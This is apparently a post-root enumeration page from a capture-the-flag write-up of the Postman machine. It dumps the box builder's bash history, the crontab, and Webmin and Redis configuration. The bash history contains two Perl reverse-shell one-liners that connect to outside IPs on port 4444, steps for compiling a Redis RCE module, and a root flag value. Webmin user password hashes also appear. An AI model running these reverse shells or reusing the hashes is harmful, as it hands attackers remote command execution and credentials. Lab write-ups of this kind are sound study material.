Postman_Beyond

Beyond

---

This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.

cron

---

root@Postman:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
@reboot ifconfig 192.168.0.80 netmask 255.255.255.0 up
@reboot iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379

home

---

root@postman:~# ll
total 76
drwx------  8 root root  4096 Sep 29  2020 ./
drwxr-xr-x 22 root root  4096 Sep 30  2020 ../
-rw-------  1 root root 14310 Sep 29  2020 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 Aug 24  2019 .cache/
drwx------  3 root root  4096 Aug 26  2019 .gnupg/
-rw-------  1 root root    28 Oct 25  2019 .lesshst
drwxr-xr-x  3 root root  4096 Aug 24  2019 .local/
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
drwxrwxr-x  6 root root  4096 Oct  2  2019 redis-5.0.0/
-rw-------  1 root root    79 Aug 25  2019 .rediscli_history
-rw-r--r--  1 root root    33 oct  5 10:58 root.txt
-rw-r--r--  1 root root    66 Oct 25  2019 .selected_editor
drwx------  2 root root  4096 Aug 25  2019 .ssh/
drwxr-xr-x  2 root root  4096 Aug 25  2019 .tmp/
-rw-------  1 root root  2105 Sep 29  2020 .viminfo

.bash_history

---

root@Postman:~# cat .bash_history
clera
clear
ls
apt install ssh
nano /etc/ssh/sshd_config 
service sshd restart
apt install net-tools
reboot
exit
nano /etc/hostname
hostname Postman
nano /etc/hosts
clear
service hostname restart
reboot
clear
deluser rachel
adduser Matt --home 
adduser Matt --home /home/Matt/
adduser Matt --home /home/Matt
adduser Matt --home /home/Matt --force-badname
ls
rm web.deb
dpkg -i webmin.deb 
cd /var/webmin
ls
locate miniserv
cd modules
ls
cd acl
ls
ls -la
cd ..
locate password_change.cgi
cd ..
ls
service webmin restart
ls
ls -la
cd modules/
ls -la
cd useradmin/
ls -la
cd ..
ls -la
cd ..
cd /etc/webmin
ls
nano config
ifconfig
cd /usr/share/webmin
ls
nano password_change.cgi 
atom password_change.cgi 
apt purge webmin
cd /
ls
cd /root
ls
dpkg -i webmin_1.920_all.deb 
cd /var/webmin
ls
cd modules
ls
cd acl
ls
cd /etc/
ls
cd webmin
nano config 
service webmin restart
apt install ssh
nano /etc/ssh/sshd_config 
clear
ifconfig
reboot
clear
wget
wget wget http://prdownloads.sourceforge.net/webadmin/webmin_1.92_all.deb
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.92_all.deb
ls
dpkg
dpkg -i web.deb 
apt install perl
dpkg -i web.deb 
apt install libnet-ssleay-perl
apt --fix-broken install
cd /var/webmin/
ls
cd ..
ls
cd webmin/
ls
ls -la
cd modules/
ls
apt purge webmin
cd ..
cd /var
;s
ls
clear
cd /etc/webmin
ls
nano miniserv.conf 
cd acl
ls
ls -la
cd /var/webmin/modules
ls
cd ..
ls -la
cd /etc/webmin
ls
cd webmin
ls
cd ..
ls
ls -la
cd passw
cd passwd
;s
ls
cd ..
ls
cd ..
ls
cd var
cd webmin/
ls
cd modules/
ls
cd acl
ls
cd ..
cd webmin
ls
cd ..
ls -la
cd webmin
ls -la
cd /etc/
ls -la
find / -name "password_change.cgi"
nano /usr/share/webmin/password_change.cgi
service webmin restart
nano /usr/share/webmin/password_change.cgi
service webmin reload
nano /usr/share/webmin/password_change.cgi
reboot
service webmin start
ifconfig
systemctl enable webmin
reboot
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
apt install apache2
exit
mv SimpleHTTPPutServer.py /var/www/html/
exit
nano /usr/share/webmin/password_change.cgi
apt purge webmin
scp root@192.168.1.4:/root/Desktop/webmin_1.910_all.deb .
ls
dpkg -i webmin_1.910_all.deb 
exit
apt install zip
ls
unzip leno-landing-page.zip 
ls
rm documentation/ -R
rm index.html
cd web
ls
mv * ../
ls
ls -la
cd ..
ls -la
rm leno-landing-page.zip 
service apache2 start
rm -R web
ls
mv SimpleHTTPPutServer.py pixova-lite.zip ../
ls
ls -la
rm * -R
ls
mv ../pixova-lite.zip .
ls
unzip pixova-lite.zip 
ls
cd pixova-lite
mv * ../
ls
cd ..
rm pixova-lite
rm pixova-lite -R
ls
apt install php
service apache2 restart
ifconfig
ls
rm * -R
ls
cd ..
ls
cd html
ls
unzip Micrology\ Free\ Website\ Template\ -\ Free-CSS.com.zip 
ls
mv micrology/* .
ls
cd micrology/
ls
cd micrology/
ls
mv * ../../
cd ..
ls
rm -R micrology/
rm 'Micrology Free Website Template - Free-CSS.com.zip' 
rm readme.txt 
rm LICENSE.txt 
ls -la
nano index.html 
service apache2 restart
nano index.html 
service apache2 restart
nano index.html 
ls
cd css
ls
cat * | "footer"
cat * | grep "footer"
cat * | grep "footer section"
cat * | grep "footersection"
nano index.html 
cd ..
nano index.html 
cd css
cat * | grep grd3
cat * | grep -l grd3
cat * | grep -l "grd3"
cat * | grep -H "grd3"
cat * | grep "grd3"
cat * | grep "grd3" -H
ls
grep -H "grd3" *.css
nano colors.css
grep -H "background" *.css
grep -H "background-image" *.css
cd ..
grep "href=" *
grep "hero" *
nano css/style
nano ccs/style
ls
nano style.css 
cd ..
ls
mv SimpleHTTPPutServer.py html/upload/
cd html/upload/
ls
python -m SimpleHTTPPutServer 8080
mv SimpleHTTPPutServer.py ../
python ../SimpleHTTPPutServer.py 8080
php
python ../SimpleHTTPPutServer.py 8080
cd ..
python ../../SimpleHTTPPutServer.py 8080
python SimpleHTTPPutServer.py 8080
ls
python html/SimpleHTTPPutServer.py 8080
mv html/SimpleHTTPPutServer.py .
python SimpleHTTPPutServer.py 8080
nano /etc/httpd/conf/httpd.conf
find / -name ".htaccess"
cd html
nano .htaccess
python SimpleHTTPPutServer.py 8080
nano dbauth.php
nano put.php
nano .htaccess 
service apache2 restart
tail -f /usr/local/apache/logs/error_log
ls
nano .htaccess
ls -la
service apache2 restart
ls -la /etc/apache2/apache2.conf
nano /etc/apache2/apache2.conf
service apache2 restart
service apache2 stop
service apache2 start
systemctl status apache2.service
nano /etc/apache2/apache2.conf
service apache2 restart
nano /etc/apache2/apache2.conf
service apache2 restart
systemctl status apache2.service
a2enmod
a2enmod rewrite
systemctl restart apache2
nano /etc/apache2/apache2.conf
systemctl restart apache2
systemctl status apache2.service
nano .htaccess
systemctl restart apache2
systemctl status apache2.service
apt install php
php -v
nano put.php
systemctl restart apache2
systemctl reload apache2
ls
rm dbauth.php 
rm .htaccess 
ls
ls -la
cd /var/www/html/upload
ls
wget https://www.arthur-mckay.com/wp-content/uploads/sites/5/2017/12/Cyber-security-web-banner.jpg
ls
cd /root
ls
unzup redis-5.0.0.tar.gz 
unzip redis-5.0.0.tar.gz 
ls
apt install gunzip
apt install gzip
gzip -d redis-5.0.0.tar.gz 
ls
rm redis-5.0.0.tar 
tar xvzf redis-5.0.0.tar.gz
ls
cd redis-5.0.0/
ls
nano INSTALL 
nano README.md 
make install
apt install make
make install
ls
cd utils/
ls
./install_server.sh 
apt install redis=5.0.0
cd ..
make
cd ..
rm redis-5.0.0 -R
tar xzf redis-5.0.0.tar.gz 
ls
cd redis-5.0.0/
make
ls
sudo apt install redis-server
apt --fix-broken
apt --fix-broken install
apt purge redis*
apt purge redis
rm * -R
cd ..
ls
rm redis-5.0.0 -R
rm *
ls
apt purge redis
reboot
apt purge redis
tar xzvf redis-5.0.0.tar.gz 
ls
cd redis-5.0.0/
ls
make
apt install gcc
make
cd deps/
make hiredis jemalloc linenoise lua
ls
cd ..
make
make test
apt install tcl
make test
make install
make test
cd utils/
./install_server.sh 
redis-cli
systemctl restart redis
systemctl enable redis
systemctl restart redis
systemctl enable redis
reboot
cd redis-5.0.0/
ls
cd utils
ls
systemctl enable redis
systemctl enable redis-server
reboot
ls
rm redis-5.0.0.tar.gz 
ls
su Matt
reboot
service redis restart
nano /etc/ssh/sshd_config 
service sshd restart
nano /etc/passwd
service passwd restart
su Matt
ls
chown root:root /usr/bin/base64
chmod +x /usr/bin/base64
chmod u-s /usr/bin/base64
ls -la /usr/bin/base64
python -m SimpleHTTPPutServer 127.0.0.1 8080
python -m SimpleHTTPServer 127.0.0.1 8080
python -m SimpleHTTPServer 
python -m SimpleHTTPServer --help
python --help
su Matt
cd /usr/bin
ls
chown Matt:Matt base64
ls -la
su Matt
nano /etc/ssh/sshd_config
systemctl sshd reload
systemctl reload sshd
system disable redis-server
systemctl disable redis-server
systemctl enable redis
service redis start
ls
cd redis
cd redis-5.0.0/
ls
cd utils/
./install_server.sh 
service redis start
cd ..
ls
cd ..
ls
apt purge redis
apt purge redis-server
cd redis-5.0.0/
ls
make install
redis
redis-cli
apt install redis-server
redis-cli
service redis start
systemctl enable redis
sudo netstat -lnp | grep redis
nano /etc/redis/redis.conf
service redis restart
sudo netstat -lnp | grep redis
service redis reload
service redis restart
systemctl reload redis
systemctl status redis.service 
nano /var/run/redis/redis-server.pid
systemctl enable redis-server
systemctl status redis.service 
systemctl enable redis-server
systemctl status redis.service 
systemctl restart redis.service 
systemctl status redis.service 
nano /var/run/redis/redis-server.pid
nano /etc/redis/redis.conf
service redis reload
systemctl reload redis
systemctl restart redis
systemctl status redis.service 
sudo netstat -lnp | grep redis
redis-cli -h `python -c 'print "A" * 300'`
apt install ld
ld
cd src
ls
scp module.o root@192.168.1.4:/root/redis-rce-master/
cd ..
ls
src
cd src
ls
make module.c
gcc -s module.c -o module.so
apt install liblua*
apt install liblua5.1-0-dev
ls
gcc -s module.c -o module.so
apt purge liblua5.1-0-dev
find / -name "lua.h"
cp /root/redis-5.0.0/deps/lua/src/lua.h .
gcc -s module.c -o module.so
ls
gcc -s module.c -o module.so
make distclean
make
ls
cd modules/
ls
cd ..
ls
nano module.c
gcc -s module.c -o module.so
cc … `pkg-config --cflags --libs lua-5.1`
apt install sudo apt-get install lua5.2
sudo apt-get install lua5.2
gcc -s module.c -o module.so
find / -name "lua.h"
ls
nano module.c
nano server.c
nano module.
nano server.h
gcc -s module.c -o module.so
ls
gcc -s module.c -o module.so
cd ..
ls
cd deps/
ls
cd lua/
ls
cd ser
cd src/
ls
pwd
cd ../../
ls
cd ..
cd src
nano module.c
nano server.h
gcc -s module.c -o module.so
ls
find / -name "module.c"
netstat -aln | grep python
netstat -aln
su Matt
reboot
netstat -aln | grep 127.0.0.1
exit
ifconfig
cd /var/www/html
ls
nano index.html
su Matt
ls
rm put.php 
cd upload/
ls
nikto-test-HUB0MCmd.html
rm nikto-test-HUB0MCmd.html
ls
cd ..
ls -la
rmdir -R /var/lib/redis/.ssh 
rmdir -r /var/lib/redis/.ssh 
rmdir /var/lib/redis/.ssh 
rmdir /var/lib/redis/.ssh -r
rmdir /var/lib/redis/.ssh -R
rmdir /var/lib/redis/.ssh -f
rm /var/lib/redis/.ssh/*
rmdir /var/lib/redis/.ssh
su Matt
reboot
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.10.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
su Matt 
cd ~/
touch root.txt
echo 'a257741c5bed8be7778c6ed95686ddce' > root.txt
cd /var/lib/redis
ls
ls -la
rm scan.py
rm -R .ssh
rm exp.so
ls -la
chage -l root
chage -l Matt
chage -l redis
passwd root
reboot
echo 'network:
 ethernets:
  enp0s3:
   addresses: [192.168.230.11/24]
    gateway4: 192.168.230.254
    dhcp4: no
    nameservers:
     addresses: [8.8.8.8,8.8.4.4]
    optional: true
 version: 2' > /etc/netplan/01-netcfg.yaml
cd /etc/netplan/
ls
netplan apply
echo 'network:
 ethernets:
  enp0s3:
   addresses: [192.168.230.11/24]
   gateway4: 192.168.230.254
   dhcp4: no
   nameservers:
    addresses: [8.8.8.8,8.8.4.4]
   optional: true
 version: 2' > /etc/netplan/01-netcfg.yaml
netplan apply
ifconfig 
exit
ps -aux
cd opt
ls
cd redis-5.0.0/
ls
crontab -l
whoami
su redis
netstat -a > text
less text
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 25 -j ACCEPT
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6739 -j ACCEPT
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379 -j ACCEPT
netstat -nlpt ~ grep 6379
service redis-server restart
reboot
 
netstat -nlpt > text
less text
cd /etc/redis/
ls
nano redis.conf
reboot
ifconfig
netstat -nlpt > text
less text
ifconfig
netstat -a
netstat -a > stats
less stats
netstat -al > stats
less stats
service redis-server status
t
exit
ifconfig
ifconfig 192.168.0.80 netmask 255.255.255.0
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
service redis-server status
service redis-server stop
nano /etc/redis/redis.conf 
reboot
ifconfig
service redis-server status
find / -name "redis-server.pid"
cd /var/run/redis-server
cd /var/run/redis-server.conf
cd /var/run/
ls
cd redis
ls
ls -la
cd ..
nano redis_6379.pid
service redis-server status
less /var/log/redis/redis-server.log 
rm /var/log/redis/redis-server.log 
service redis-server status
less /var/log/redis/redis-server.log 
touch /var/log/redis/redis-server.log 
service redis-server start
touch /var/log/redis/redis-server.log 
less /var/log/redis/redis-server.log 
ps > ps
less ps
ps aux > ps
less ps
kill 354
service redis-server start
service redis-server status
less /var/log/redis/redis-server.log 
reboot
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
ls
rm stats
rm statsn
rm run
rm pp
netstat -al > stats
less stats
nano /etc/redis/redis.conf 
reboot
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
service redis-server status
systemctl edit redis-server
systemctl edit redis-server.service
systemctl disable redis-server
ls -la
cat text
netstat -al > new
less new
netstat -a > snew
less snew
reboot
netstat -a > ssnew
less ssnew
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6739 -j ACCEPT
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
nano /etc/redis/redis.conf 
service redis-server status
ps -aux > new.t
less new.t
kill 324
service redis-server start
service redis-server status
nano /etc/network/interfaces
sudo ifdown enp0s3
nano /etc/network/interfaces
ip addr show
crontab -e
less ssnew
rm ssnew
rm snew
netstat -a > snew
less snew
crontab -e
less snew
crontab -e
less snew
crontab -e
reboot
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
netstat -a > news
less news
crontab -l
ls -la
rm new news new.t snew stats text
ls -la
cd redis-5.0.0/
ls -la
cd tests
ls -la
cd ..
ls -la
cd ..
ls -la
systemctl disable redis-server
systemctl edit redis-server.service
less /var/log/redis/redis-server.log 
ps aux > psn
less psn
kill 349
/etc/redis/
cd /etc/redis/
ls
nano redis.conf 
systemctl disable redis
systemctl disable redis-server
reboot
netstat -a > newss
less newss
redis-server
ps -a
ps aux > newss
less newss
update-rc.d redis-server
update-rc.d redis-server remove
reboot
ps aux > newss
less newss
update-rc.d redis_6379 disable
reboot
netstat -a > l
less l
systemctl enable redis
systemctl enable redis-server
reboot
ls
rm l newss psn
netstat -a > l
less l
ls
rm l
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
reboot
cd /etc/netplan/
ls -l
vim 01-netcfg.yaml 
nano01-netcfg.yaml
nano 01-netcfg.yaml 
netplan apply
ping -c 1 8.8.8.8
apt-get install ifupdown
apt-get install vim
apt-get update
vim /etc/default/grub 
apt-get install vim
vim /etc/default/grub 
vim /etc/network/interfaces
rm /etc/netplan/01-netcfg.yaml
apt-get remove netplan.io 
ifconfig ens33
reboot
ifconfig
poweroff
apt -y install open-vm-tools#
apt -y install open-vm-tools
vim /etc/resolv.conf 
apt -y install open-vm-tools
apt update
apt -y install open-vm-tools
service open-vm-tools restart 
poweroff

.rediscli_history

---

root@postman:~# cat .rediscli_history
ping
set test "It's working!"
get test
exit
service redis start
exit
ping
exit

web app over80

---

root@Postman:~# ll /var/www/html
total 56
drwxr-xr-x 7 root root  4096 Aug 26  2019 ./
drwxr-xr-x 3 root root  4096 Aug 25  2019 ../
drwxr-xr-x 2 root root  4096 Aug 25  2019 css/
drwxr-xr-x 2 root root  4096 Apr 23  2019 fonts/
drwxr-xr-x 3 root root  4096 Apr 23  2019 images/
-rw-r--r-- 1 root root  3844 Aug 25  2019 index.html
drwxr-xr-x 2 root root  4096 Apr 23  2019 js/
-rw-r--r-- 1 root root 24465 Aug 25  2019 style.css
drwxr-xr-x 2 root root  4096 Aug 26  2019 upload/

Webmin

---

root@postman:~# cat /etc/webmin/miniserv.conf
port=10000
root=/usr/share/webmin
mimetypes=/usr/share/webmin/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server
logfile=/var/webmin/miniserv.log
errorlog=/var/webmin/miniserv.error
pidfile=/var/webmin/miniserv.pid
logtime=168
ssl=1
no_ssl2=1
no_ssl3=1
no_tls1=1
no_tls1_1=1
ssl_honorcipherorder=1
no_sslcompression=1
env_WEBMIN_CONFIG=/etc/webmin
env_WEBMIN_VAR=/var/webmin
atboot=1
logout=/etc/webmin/logout-flag
listen=10000
denyfile=\.pl$
log=1
blockhost_failures=5
blockhost_time=60
syslog=1
ipv6=1
session=1
premodules=WebminCore
server=MiniServ/1.910
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
passwd_uindex=0
passwd_pindex=1
passwd_cindex=2
passwd_mindex=4
passwd_mode=0
preroot=authentic-theme
passdelay=1
login_script=/etc/webmin/login.pl
cipher_list_def=1
failed_script=/etc/webmin/failed.pl
logout_script=/etc/webmin/logout.pl
sudo=1
error_handler_404=404.cgi
error_handler_403=403.cgi
error_handler_401=401.cgi
nolog=.*xhr.*
logouttimes=

miniserv.users

---

root@Postman:~# cat /etc/webmin/miniserv.users
root:x:0
Matt:$1$66786052$X4Cmmtw8EF7bUyoj.vKG//:::::1566786052:$1$66750897$uFdZ1DtY4wVzGBtVY.xja/::0::::

Matt.acl

---

root@postman:~# cat /etc/webmin/Matt.acl
gedit2=
feedback=2
uedit2=
root=/
webminsearch=1
negative=0
gedit_mode=0
nodot=0
rpc=2
otherdirs=
uedit_mode=0
fileunix=
readonly=0
gedit=
uedit=